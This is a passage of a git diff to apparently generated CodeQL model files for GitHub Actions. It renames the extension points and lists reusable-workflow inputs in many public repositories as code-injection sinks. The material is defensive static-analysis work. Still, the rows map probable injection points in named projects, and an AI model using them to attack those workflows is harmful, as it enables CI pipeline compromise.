"input.environment", "code-injection", "generated"] - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.workflow-caller-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml index 6363564503c9..75877fa48aa7 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.branch", "code-injection", "generated"] - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml index fce736676fea..489e6134eba4 100644 --- a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "input.pytestArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml index 593322a739eb..4feef931f71e 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml index b3984a7ab831..189cd8bbafdc 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml index a6f1bd4569db..418694a596d1 100644 --- a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "input.dist-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml index b661a1fa26aa..10c4f8a3e3c3 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "input.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml index 0f58971041d4..1837a505499e 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "input.terraform_workingdir", "code-injection", "generated"] - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "input.parameters-file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml index f12a337d71dd..094e4602e8e2 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml index 76796b4ae383..ec264f96bf16 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml index 8cc08edff5d6..7463396b1522 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.shell", "code-injection", "generated"] - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml index c2963eb76f45..4c52a10d4f1d 100644 --- a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml index 66aea90b41a6..a6c5a8b8e3bc 100644 --- a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml index 49ed7bca899b..286e75fc9e20 100644 --- a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.REGISTRY", "code-injection", "generated"] - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.IMAGE_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml index fd0a2d9110a9..9ea5a9a34c70 100644 --- a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "input.features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml index 1a3bdd1b3803..34e41e9c589d 100644 --- a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.last_commit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml index 6185f9d03d05..cc38156973bd 100644 --- a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.destination-tag", "code-injection", "generated"] - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.origin-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml index 273bbc695405..748287e75f82 100644 --- a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cemu-project/cemu/.github/workflows/build.yml", "*", "input.experimentalversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml index 3aac3af3cae6..703a138d28d7 100644 --- a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.test-package-base-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml index 9887b8e5f3ae..97f1bafd1f38 100644 --- a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cgal/cgal/.github/workflows/send_email.yml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml index 4c6379fd94b1..064c946363f7 100644 --- a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "input.version", "code-injection", "generated"] - ["checkstyle/checkstyle/.github/workflows/release-update-xdoc-with-releasenotes.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml index 35738fe6c0f8..4a5c66bc7440 100644 --- a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.docker-context", "code-injection", "generated"] - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.image_subpath", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml index 77db768cf32e..a1e4b624b454 100644 --- a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.scala", "code-injection", "generated"] - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.circt", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml index 509de9546464..888aed947da2 100644 --- a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.test_name", "code-injection", "generated"] - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.run_command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml index 6e0e2865e83c..3b5f69e93423 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml index 69667ce10b10..8e28b46f2c70 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml", "*", "input.matrix-key", "output.result", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml index 175012c10c94..7f63b48ed848 100644 --- a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_sim", "code-injection", "generated"] - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_nosim", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml index 84a834d9a1f0..e7e42031e047 100644 --- a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.php-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml index 2946a78cf835..0c34609ccefc 100644 --- a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.millargs", "code-injection", "generated"] - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.buildcmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml index 7ce68d84ca5e..82de946e406e 100644 --- a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.upgrade-plan-name", "code-injection", "generated"] - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-upgrade-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml index 8e3b9ccc0f8a..09c4c2a83c31 100644 --- a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.latest", "code-injection", "generated"] - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.image_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml index f41e2ee12461..0e4571fc728b 100644 --- a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "input.version", "code-injection", "generated"] - ["cryptomator/cryptomator/.github/workflows/av-whitelist.yml", "*", "input.url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml index c643a6a9fe06..6a03acfb11dc 100644 --- a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.pr-number", "code-injection", "generated"] - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.build-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml index 9aad213b1dfe..f41ee1211d3d 100644 --- a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.name", "code-injection", "generated"] - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.tag_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml index 1906ef45379e..8a64c0ce5f11 100644 --- a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.mage-targets", "code-injection", "generated"] - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.dev-engine", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml index f5ce50243f7c..18e66bf72913 100644 --- a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.deploy_path", "code-injection", "generated"] - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.envname", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml index 58c30f3cd026..1ed7561a5334 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "input.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml index d6c0ced50a6a..738fde2cb865 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "input.ddtrace-version", "code-injection", "generated"] - ["datadog/dd-trace-py/.github/workflows/build-and-publish-image.yml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml index fdcb8775dad4..c61a63f11443 100644 --- a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.run_id", "code-injection", "generated"] - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.source_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml index 66889d2cf428..fef036f4f297 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml index e5c5cfeabd37..b13ba8bc40f0 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.test_run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml index 4dc3fc2bc98f..3fb2fefff6b9 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml index 52c4b4c7a24c..4344e254be05 100644 --- a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["decidim/decidim/.github/workflows/test_app.yml", "*", "input.test_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml index 